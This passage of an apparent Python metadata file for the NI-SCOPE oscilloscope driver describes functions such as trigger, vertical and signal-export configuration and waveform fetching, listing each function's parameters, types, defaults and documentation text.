'name': 'lowLevel',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nPasses the voltage threshold you want the digitizer to use for high\ntriggering.\n'
},
'name': 'highLevel',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies whether you want the trigger to occur when the signal enters\nor leaves a window.\n'
},
'enum': 'TriggerWindowMode',
'name': 'windowMode',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nApplies coupling and filtering options to the trigger signal. Refer to\nNISCOPE_ATTR_TRIGGER_COUPLING for more information.\n'
},
'enum': 'TriggerCoupling',
'name': 'triggerCoupling',
'type': 'ViInt32'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nThe length of time the digitizer waits after detecting a trigger before\nenabling NI-SCOPE to detect another trigger. Refer to\nNISCOPE_ATTR_TRIGGER_HOLDOFF for more information.\n'
},
'name': 'holdoff',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'default_value': 'datetime.timedelta(seconds=0.0)',
'direction': 'in',
'documentation': {
'description': '\nHow long the digitizer waits after receiving the trigger to start\nacquiring data. Refer to NISCOPE_ATTR_TRIGGER_DELAY_TIME for more\ninformation.\n'
},
'name': 'delay',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
}
],
'returns': 'ViStatus'
},
'ConfigureTvTriggerLineNumber': {
'codegen_method': 'no',
'documentation': {
'description': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n\nConfigures the TV line upon which the instrument triggers. The line\nnumber is absolute and not relative to the field of the TV signal.\n\nThis function affects instrument behavior only if the trigger type is\nset to NISCOPE_VAL_TV_TRIGGER and the TV trigger event is set to\nNISCOPE_VAL_TV_EVENT_LINE_NUMBER. Call\nniScope_ConfigureTVTriggerSource to set the TV trigger event before\ncalling this function.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecify the line number of the signal you want to trigger off of. The\nvalid ranges of the attribute depend on the signal format configured.\n\nDefault Value: 1\n',
'table_body': [
[
'M-NTSC, 480i, 480p',
'1 to 525'
],
[
'BG/PAL, SECAM, 576i, 576p',
'1 to 625'
],
[
'720p',
'1 to 750'
],
[
'1080i,1080p',
'1 to 1,125'
]
],
'table_header': [
'Signal Format',
'Line Numbers'
]
},
'name': 'lineNumber',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'ConfigureTvTriggerSource': {
'codegen_method': 'no',
'documentation': {
'description': '\nConfigures the instrument for TV triggering. It configures the TV signal\nformat, the event, and the signal polarity.\n\nThis function affects instrument behavior only if the trigger type is\nNISCOPE_VAL_TV_TRIGGER. Set the trigger type and trigger coupling\nbefore calling this function.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nPass the source you want the digitizer to monitor for a trigger.\n\nDefined Values\n\n| "0"—Channel 0\n| "1"—Channel 1\n| NISCOPE_VAL_EXTERNAL—Analog External Trigger Input\n'
},
'name': 'source',
'type': 'ViString'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the Video/TV signal format.\n\nDefined Values\n\n| NISCOPE_VAL_NTSC (1)\n| NISCOPE_VAL_PAL (2)\n| NISCOPE_VAL_SECAM (3)\n'
},
'name': 'signalFormat',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nVideo/TV event to trigger off of.\n\nDefined Values\n\n| NISCOPE_VAL_TV_EVENT_FIELD1 (1)—trigger on field 1 of the signal\n| NISCOPE_VAL_TV_EVENT_FIELD2 (2)—trigger on field 2 of the signal\n| NISCOPE_VAL_TV_EVENT_ANY_FIELD (3)—trigger on the first field\n acquired\n| NISCOPE_VAL_TV_EVENT_ANY_LINE (4)—trigger on the first line\n acquired\n| NISCOPE_VAL_TV_EVENT_LINE_NUMBER (5)—trigger on a specific line\n of a video signal. Valid values vary depending on the signal format\n configured.\n'
},
'name': 'event',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\n| Specifies the polarity of the video signal to trigger off of.\n\nDefined Values\n\n| NISCOPE_VAL_TV_POSITIVE (1)\n| NISCOPE_VAL_TV_NEGATIVE (2)\n'
},
'name': 'polarity',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'ConfigureVertical': {
'documentation': {
'description': '\nConfigures the most commonly configured attributes of the digitizer\nvertical subsystem, such as the range, offset, coupling, probe\nattenuation, and the channel.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the vertical range Refer to NISCOPE_ATTR_VERTICAL_RANGE for\nmore information.\n'
},
'name': 'range',
'type': 'ViReal64'
},
{
'default_value': 0.0,
'direction': 'in',
'documentation': {
'description': '\nSpecifies the vertical offset. Refer to NISCOPE_ATTR_VERTICAL_OFFSET\nfor more information.\n'
},
'name': 'offset',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies how to couple the input signal. Refer to\nNISCOPE_ATTR_VERTICAL_COUPLING for more information.\n'
},
'enum': 'VerticalCoupling',
'name': 'coupling',
'type': 'ViInt32'
},
{
'default_value': 1.0,
'direction': 'in',
'documentation': {
'description': '\nSpecifies the probe attenuation. Refer to\nNISCOPE_ATTR_PROBE_ATTENUATION for valid values.\n'
},
'name': 'probeAttenuation',
'type': 'ViReal64'
},
{
'default_value': True,
'direction': 'in',
'documentation': {
'description': '\nSpecifies whether the channel is enabled for acquisition. Refer to\nNISCOPE_ATTR_CHANNEL_ENABLED for more information.\n'
},
'name': 'enabled',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'Disable': {
'documentation': {
'description': '\nAborts any current operation, opens data channel relays, and releases\nRTSI and PFI lines.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ErrorHandler': {
'codegen_method': 'no',
'documentation': {
'description': '\nTakes the error code returned by NI-SCOPE functions and returns the\ninterpretation as a user-readable string.\n',
'note': '\nYou can pass VI_NULL as the instrument handle, which is useful to\ninterpret errors after niScope_init has failed.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe error code that is returned from any of the instrument driver\nfunctions.\n'
},
'name': 'errorCode',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nSpecifies the function in which the error occurred. You can pass in a\nstring no longer than MAX_FUNCTION_NAME_SIZE. If you pass in a valid\nstring, this source is included in the **errorDescription** string. For\nexample:\n\n"Error <**errorCode**> at <**errorSource**>"\n\nIf you pass in NULL or an empty string, this parameter is ignored.\n'
},
'name': 'errorSource',
'size': {
'mechanism': 'fixed',
'value': 55
},
'type': 'ViChar[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the interpreted error code as a user readable message string;\nyou must pass a ViChar array at least MAX_ERROR_DESCRIPTION bytes in\nlength.\n'
},
'name': 'errorDescription',
'size': {
'mechanism': 'fixed',
'value': 388
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'ExportAttributeConfigurationBuffer': {
'documentation': {
'description': '\nExports the attribute configuration of the session to a configuration\nbuffer.\n\nYou can export and import session attribute configurations only between\ndevices with identical model numbers, channel counts, and onboard memory\nsizes.\n\nThis function verifies that the attributes you have configured for the\nsession are valid. If the configuration is invalid, NI‑SCOPE returns an\nerror.\n\n**Related Topics:**\n\n`Attributes and Attribute\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(attributes_and_attribute_functions)>`__\n\n`Setting Attributes Before Reading\nAttributes <REPLACE_DRIVER_SPECIFIC_URL_1(setting_before_reading_attributes)>`__\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the size, in bytes, of the byte array to export. If you enter\n0, this function returns the needed size.\n'
},
'name': 'sizeInBytes',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nSpecifies the byte array buffer to be populated with the exported\nattribute configuration.\n'
},
'name': 'configuration',
'size': {
'mechanism': 'ivi-dance',
'value': 'sizeInBytes'
},
'type': 'ViInt8[]'
}
],
'returns': 'ViStatus'
},
'ExportAttributeConfigurationFile': {
'documentation': {
'description': '\nExports the attribute configuration of the session to the specified\nfile.\n\nYou can export and import session attribute configurations only between\ndevices with identical model numbers, channel counts, and onboard memory\nsizes.\n\nThis function verifies that the attributes you have configured for the\nsession are valid. If the configuration is invalid, NI‑SCOPE returns an\nerror.\n\n**Related Topics:**\n\n`Attributes and Attribute\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(attributes_and_attribute_functions)>`__\n\n`Setting Attributes Before Reading\nAttributes <REPLACE_DRIVER_SPECIFIC_URL_1(setting_before_reading_attributes)>`__\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the absolute path to the file to contain the exported\nattribute configuration. If you specify an empty or relative path, this\nfunction returns an error.\n**Default file extension:** .niscopeconfig\n'
},
'name': 'filePath',
'type': 'ViConstString'
}
],
'returns': 'ViStatus'
},
'ExportSignal': {
'codegen_method': 'no',
'documentation': {
'description': '\nConfigures the digitizer to generate a signal that other devices can\ndetect when configured for digital triggering or sharing clocks. The\n**signal** parameter specifies what condition causes the digitizer to\ngenerate the signal. The **outputTerminal** parameter specifies where to\nsend the signal on the hardware (such as a PFI connector or RTSI line).\n\nIn cases where multiple instances of a particular signal exist, use the\n**signalIdentifier** input to specify which instance to control. For\nnormal signals, only one instance exists and you should leave this\nparameter set to the empty string. You can call this function multiple\ntimes and set each available line to a different signal.\n\nTo unprogram a specific line on device, call this function with the\nsignal you no longer want to export and set **outputTerminal** to\nNISCOPE_VAL_NONE.\n',
'note': 'This function replaces niScope_ConfigureTriggerOutput.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nsignal (clock, trigger, or event) to export.\n\n**Defined Values**\n',
'table_body': [
[
'NISCOPE_VAL_REF_TRIGGER',
'(1)',
'Generate a pulse when detecting the Stop/Reference trigger.'
],
[
'NISCOPE_VAL_START_TRIGGER',
'(2)',
'Generate a pulse when detecting a Start trigger.'
],
[
'NISCOPE_VAL_END_OF_ACQUISITION_EVENT',
'(3)',
'Generate a pulse when the acquisition finishes.'
],
[
'NISCOPE_VAL_END_OF_RECORD_EVENT',
'(4)',
'Generate a pulse at the end of the record.'
],
[
'NISCOPE_VAL_ADVANCE_TRIGGER',
'(5)',
'Generate a pulse when detecting an Advance trigger.'
],
[
'NISCOPE_VAL_READY_FOR_ADVANCE_EVENT',
'(6)',
'Asserts when the digitizer is ready to advance to the next record.'
],
[
'NISCOPE_VAL_READY_FOR_START_EVENT',
'(7)',
'Asserts when the digitizer is initiated and ready to accept a Start trigger and begin sampling.'
],
[
'NISCOPE_VAL_READY_FOR_REF_EVENT',
'(10)',
'Asserts when the digitizer is ready to accept a Reference trigger.'
],
[
'NISCOPE_VAL_REF_CLOCK',
'(100)',
'Export the Reference clock for the digitizer to the specified terminal.'
],
[
'NISCOPE_VAL_SAMPLE_CLOCK',
'(101)',
'Export the Sample clock for the digitizer to the specified terminal.'
],
[
'NISCOPE_VAL_5V_OUT',
'(13)',
'Exports a 5 V power supply.'
]
]
},
'enum': 'ExportableSignals',
'name': 'signal',
'type': 'ViInt32'
},
{
'default_value': '"None"',
'direction': 'in',
'documentation': {
'description': 'Describes the signal being exported.'
},
'name': 'signalIdentifier',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nIdentifies the hardware signal line on which the digital pulse is\ngenerated.\n\n**Defined Values**\n',
'table_body': [
[
'NISCOPE_VAL_RTSI_0',
'("VAL_RTSI_0")'
],
[
'NISCOPE_VAL_RTSI_1',
'("VAL_RTSI_1")'
],
[
'NISCOPE_VAL_RTSI_2',
'("VAL_RTSI_2")'
],
[
'NISCOPE_VAL_RTSI_3',
'("VAL_RTSI_3")'
],
[
'NISCOPE_VAL_RTSI_4',
'("VAL_RTSI_4")'
],
[
'NISCOPE_VAL_RTSI_5',
'("VAL_RTSI_5")'
],
[
'NISCOPE_VAL_RTSI_6',
'("VAL_RTSI_6")'
],
[
'NISCOPE_VAL_RTSI_7',
'("VAL_RTSI_7")'
],
[
'NISCOPE_VAL_PXI_STAR',
'("VAL_PXI_STAR")'
],
[
'NISCOPE_VAL_PFI_0',
'("VAL_PFI_0")'
],
[
'NISCOPE_VAL_PFI_1',
'("VAL_PFI_1")'
],
[
'NISCOPE_VAL_PFI_2',
'("VAL_PFI_2")'
],
[
'NISCOPE_VAL_CLK_OUT',
'("VAL_CLK_OUT")'
]
]
},
'name': 'outputTerminal',
'type': 'ViConstString'
}
],
'returns': 'ViStatus'
},
'FancyFetch': {
'codegen_method': 'python-only',
'documentation': {
'description': '\nReturns the waveform from a previously initiated acquisition that the\ndigitizer acquires for the specified channel. This function returns\nscaled voltage waveforms.\n\nThis function may return multiple waveforms depending on the number of\nchannels, the acquisition type, and the number of records you specify.',
'note': 'Some functionality, such as time stamping, is not supported in all digitizers.'
},
'method_templates': [
{
'documentation_filename': 'default_method',
'method_python_name_suffix': '',
'session_filename': 'fancy_fetch'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': 'The instrument handle you obtain from niScope_init that identifies a particular instrument session.'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'The channel(s) to fetch from.'
},
'name': 'channelList',
'type': 'ViString'
},
{
'default_value': None,
'direction': 'in',
'documentation': {
'description': 'The maximum number of samples to fetch for each waveform. If the acquisition finishes with fewer points than requested, some devices return partial data if the acquisition finished, was aborted, or a timeout of 0 was used. If it fails to complete within the timeout period, the function raises.'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'default_value': 'FetchRelativeTo.PRETRIGGER',
'direction': 'in',
'documentation': {
'description': 'Position to start fetching within one record.'
},
'enum': 'FetchRelativeTo',
'name': 'relativeTo',
'type': 'ViInt32'
},
{
'default_value': 0,
'direction': 'in',
'documentation': {
'description': 'Offset in samples to start fetching data within each record. The offset can be positive or negative.'
},
'name': 'offset',
'type': 'ViInt32'
},
{
'default_value': 0,
'direction': 'in',
'documentation': {
'description': 'Zero-based index of the first record to fetch.'
},
'name': 'recordNumber',
'type': 'ViInt32'
},
{
'default_value': None,
'direction': 'in',
'documentation': {
'description': 'Number of records to fetch. Use -1 to fetch all configured records.'
},
'name': 'numRecords',
'type': 'ViInt32'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': 'The time to wait for data to be acquired; using 0 for this parameter tells NI-SCOPE to fetch whatever is currently available. Using -1 seconds for this parameter implies infinite timeout.'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'python_type': 'float or datetime.timedelta',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of classes with the following timing and scaling information about each waveform:\n\n- **relative_initial_x** (float) the time (in seconds) from the trigger to the first sample in the fetched waveform\n- **absolute_initial_x** (float) timestamp (in seconds) of the first fetched sample. This timestamp is comparable between records and acquisitions; devices that do not support this parameter use 0 for this output.\n- **x_increment** (float) the time between points in the acquired waveform in seconds\n- **channel** (str) channel name this waveform was asquire from\n- **record** (int) record number of this waveform\n- **gain** (float) the gain factor of the given channel; useful for scaling binary data with the following formula:\n\n .. math::\n\n voltage = binary data * gain factor + offset\n\n- **offset** (float) the offset factor of the given channel; useful for scaling binary data with the following formula:\n\n .. math::\n\n voltage = binary data * gain factor + offset\n\n- **samples** (array of float) floating point array of samples. Length will be of the actual samples acquired\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': '(num_samples * self._actual_num_wfms())'
},
'type': 'struct niScope_wfmInfo[]'
}
],
'python_name': 'fetch',
'returns': 'ViStatus'
},
'FancyGetEqualizationFilterCoefficients': {
'codegen_method': 'python-only',
'documentation': {
'description': 'Retrieves the custom coefficients for the equalization FIR filter on the device. This filter is designed to compensate the input signal for artifacts introduced to the signal outside of the digitizer. Because this filter is a generic FIR filter, any coefficients are valid. Coefficient values should be between +1 and –1.'
},
'method_templates': [
{
'documentation_filename': 'default_method',
'method_python_name_suffix': '',
'session_filename': 'get_equalization_filter_coefficients'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': 'The instrument handle you obtain from niScope_init that identifies a particular instrument session.'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'The channel to configure.'
},
'name': 'channel',
'type': 'ViString'
}
],
'python_name': 'get_equalization_filter_coefficients',
'returns': 'ViStatus'
},
'FancyRead': {
'codegen_method': 'python-only',
'documentation': {
'description': '\nInitiates an acquisition, waits for it to complete, and retrieves the\ndata. The process is similar to calling niScope_InitiateAcquisition,\nniScope_AcquisitionStatus, and niScope_Fetch. The only difference is\nthat with niScope_Read, you enable all channels specified with\n**channelList** before the acquisition; in the other method, you enable\nthe channels with niScope_ConfigureVertical.\n\nThis function may return multiple waveforms depending on the number of\nchannels, the acquisition type, and the number of records you specify.',
'note': 'Some functionality, such as time stamping, is not supported in all digitizers.'
},
'method_templates': [
{
'documentation_filename': 'default_method',
'method_python_name_suffix': '',
'session_filename': 'fancy_fetch'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': 'The instrument handle you obtain from niScope_init that identifies a particular instrument session.'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'The channel(s) to read from.'
},
'name': 'channelList',
'type': 'ViString'
},
{
'default_value': None,
'direction': 'in',
'documentation': {
'description': 'The maximum number of samples to fetch for each waveform. If the acquisition finishes with fewer points than requested, some devices return partial data if the acquisition finished, was aborted, or a timeout of 0 was used. If it fails to complete within the timeout period, the function raises.'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'default_value': 'FetchRelativeTo.PRETRIGGER',
'direction': 'in',
'documentation': {
'description': 'Position to start fetching within one record.'
},
'enum': 'FetchRelativeTo',
'name': 'relativeTo',
'type': 'ViInt32'
},
{
'default_value': 0,
'direction': 'in',
'documentation': {
'description': 'Offset in samples to start fetching data within each record. The offset can be positive or negative.'
},
'name': 'offset',
'type': 'ViInt32'
},
{
'default_value': 0,
'direction': 'in',
'documentation': {
'description': 'Zero-based index of the first record to fetch.'
},
'name': 'recordNumber',
'type': 'ViInt32'
},
{
'default_value': None,
'direction': 'in',
'documentation': {
'description': 'Number of records to fetch. Use -1 to fetch all configured records.'
},
'name': 'numRecords',
'type': 'ViInt32'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': 'The time to wait for data to be acquired; using 0 for this parameter tells NI-SCOPE to fetch whatever is currently available. Using -1 seconds for this parameter implies infinite timeout.'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'python_type': 'float or datetime.timedelta',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of classes with the following timing and scaling information about each waveform:\n\n- **relative_initial_x** (float) the time (in seconds) from the trigger to the first sample in the fetched waveform\n- **absolute_initial_x** (float) timestamp (in seconds) of the first fetched sample. This timestamp is comparable between records and acquisitions; devices that do not support this parameter use 0 for this output.\n- **x_increment** (float) the time between points in the acquired waveform in seconds\n- **channel** (str) channel name this waveform was asquire from\n- **record** (int) record number of this waveform\n- **gain** (float) the gain factor of the given channel; useful for scaling binary data with the following formula:\n\n .. math::\n\n voltage = binary data * gain factor + offset\n\n- **offset** (float) the offset factor of the given channel; useful for scaling binary data with the following formula:\n\n .. math::\n\n voltage = binary data * gain factor + offset\n\n- **samples** (array of float) floating point array of samples. Length will be of the actual samples acquired\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': '(num_samples * self._actual_num_wfms())'
},
'type': 'struct niScope_wfmInfo[]'
}
],
'python_name': 'read',
'returns': 'ViStatus'
},
'Fetch': {
'codegen_method': 'private',
'documentation': {
'description': '\nReturns the waveform from a previously initiated acquisition that the\ndigitizer acquires for the specified channel. This function returns\nscaled voltage waveforms.\n\nThis function may return multiple waveforms depending on the number of\nchannels, the acquisition type, and the number of records you specify.\n',
'note': '\nYou can use niScope_Read instead of this function. niScope_Read\nstarts an acquisition on all enabled channels, waits for the acquisition\nto complete, and returns the waveform for the specified channel.\n\nSome functionality, such as time stamping, is not supported in all\ndigitizers. Refer to `Features Supported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'method_name_for_documentation': 'fetch',
'method_templates': [
{
'method_python_name_suffix': '',
'session_filename': 'default_method'
},
{
'method_python_name_suffix': '_into_numpy',
'session_filename': 'numpy_read_method'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe maximum number of samples to fetch for each waveform. If the\nacquisition finishes with fewer points than requested, some devices\nreturn partial data if the acquisition finished, was aborted, or a\ntimeout of 0 was used. If it fails to complete within the timeout\nperiod, the function returns an error.\n'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array whose length is the **numSamples** times number of\nwaveforms. Call niScope_ActualNumwfms to determine the number of\nwaveforms.\n\nNI-SCOPE returns this data sequentially, so all record 0 waveforms are\nfirst. For example, with a channel list of 0,1, you would have the\nfollowing index values:\n\nindex 0 = record 0, channel 0\n\nindex *x* = record 0, channel 1\n\nindex 2\\ *x* = record 1, channel 0\n\nindex 3\\ *x* = record 1, channel 1\n\nWhere *x* = the record length\n'
},
'name': 'waveform',
'numpy': True,
'size': {
'mechanism': 'python-code',
'value': '(num_samples * self._actual_num_wfms())'
},
'type': 'ViReal64[]',
'use_array': True
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of structures with the following timing and scaling\ninformation about each waveform:\n\n- **relativeInitialX**—the time (in seconds) from the trigger to the\n first sample in the fetched waveform\n- **absoluteInitialX**—timestamp (in seconds) of the first fetched\n sample. This timestamp is comparable between records and\n acquisitions; devices that do not support this parameter use 0 for\n this output.\n- **xIncrement**—the time between points in the acquired waveform in\n seconds\n- **actualSamples**—the actual number of samples fetched and placed in\n the waveform array\n- **gain**—the gain factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\n- **offset**—the offset factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\nCall niScope_ActualNumWfms to determine the size of this array.\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'struct niScope_wfmInfo[]'
}
],
'returns': 'ViStatus'
},
'FetchArrayMeasurement': {
'codegen_method': 'private',
'documentation': {
'description': '\nObtains a waveform from the digitizer and returns the specified\nmeasurement array. This function may return multiple waveforms depending\non the number of channels, the acquisition type, and the number of\nrecords you specify.\n',
'note': '\nSome functionality, such as time stamping, is not supported in all\ndigitizers. Refer to `Features Supported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe `array\nmeasurement <REPLACE_DRIVER_SPECIFIC_URL_2(array_measurements_refs)>`__\nto perform.\n'
},
'enum': 'ArrayMeasurement',
'name': 'arrayMeasFunction',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe maximum number of samples returned in the measurement waveform array\nfor each waveform measurement. Use niScope_ActualMeasWfmSize to\ndetermine the number of available samples.\n',
'note': '\nUse the attribute NISCOPE_ATTR_FETCH_MEAS_NUM_SAMPLES to set the\nnumber of samples to fetch when performing a measurement. For more\ninformation about when to use this attribute, refer to the `NI\nKnowledgeBase <javascript:WWW(WWW_KB_MEAS)>`__.\n'
},
'name': 'measWfmSize',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_meas_wfm_size(array_meas_function)'
},
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array whose length is the number of waveforms times\n**measWfmSize**; call niScope_ActualNumWfms to determine the number of\nwaveforms; call niScope_ActualMeasWfmSize to determine the size of each\nwaveform.\n\nNI-SCOPE returns this data sequentially, so all record 0 waveforms are\nfirst. For example, with channel list of 0, 1, you would have the\nfollowing index values:\n\nindex 0 = record 0, channel 0\n\nindex *x* = record 0, channel 1\n\nindex 2\\ *x* = record 1, channel 0\n\nindex 3\\ *x* = record 1, channel 1\n\nWhere *x* = the record length\n'
},
'name': 'measWfm',
'size': {
'mechanism': 'python-code',
'value': '(self._actual_meas_wfm_size(array_meas_function) * self._actual_num_wfms())'
},
'type': 'ViReal64[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of structures with the following timing and scaling\ninformation about each waveform:\n\n- **relativeInitialX**—the time (in seconds) from the trigger to the\n first sample in the fetched waveform\n- **absoluteInitialX**—timestamp (in seconds) of the first fetched\n sample. This timestamp is comparable between records and\n acquisitions; devices that do not support this parameter use 0 for\n this output.\n- **xIncrement**—the time between points in the acquired waveform in\n seconds\n- **actualSamples**—the actual number of samples fetched and placed in\n the waveform array\n- **gain**—the gain factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\n- **offset**—the offset factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\nCall niScope_ActualNumWfms to determine the size of this array.\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'struct niScope_wfmInfo[]'
}
],
'returns': 'ViStatus'
},
'FetchBinary16': {
'codegen_method': 'private',
'documentation': {
'description': '\nRetrieves data from a previously initiated acquisition and returns\nbinary 16-bit waveforms. This function may return multiple waveforms\ndepending on the number of channels, the acquisition type, and the\nnumber of records you specify.\n\nRefer to `Using Fetch\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(using_fetch_functions)>`__ for\nmore information on using this function.\n',
'note': '\nSome functionality, such as time stamping, is not supported in all\ndigitizers. Refer to `Features Supported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'method_name_for_documentation': 'fetch_into',
'method_templates': [
{
'method_python_name_suffix': '_into_numpy',
'session_filename': 'numpy_read_method'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
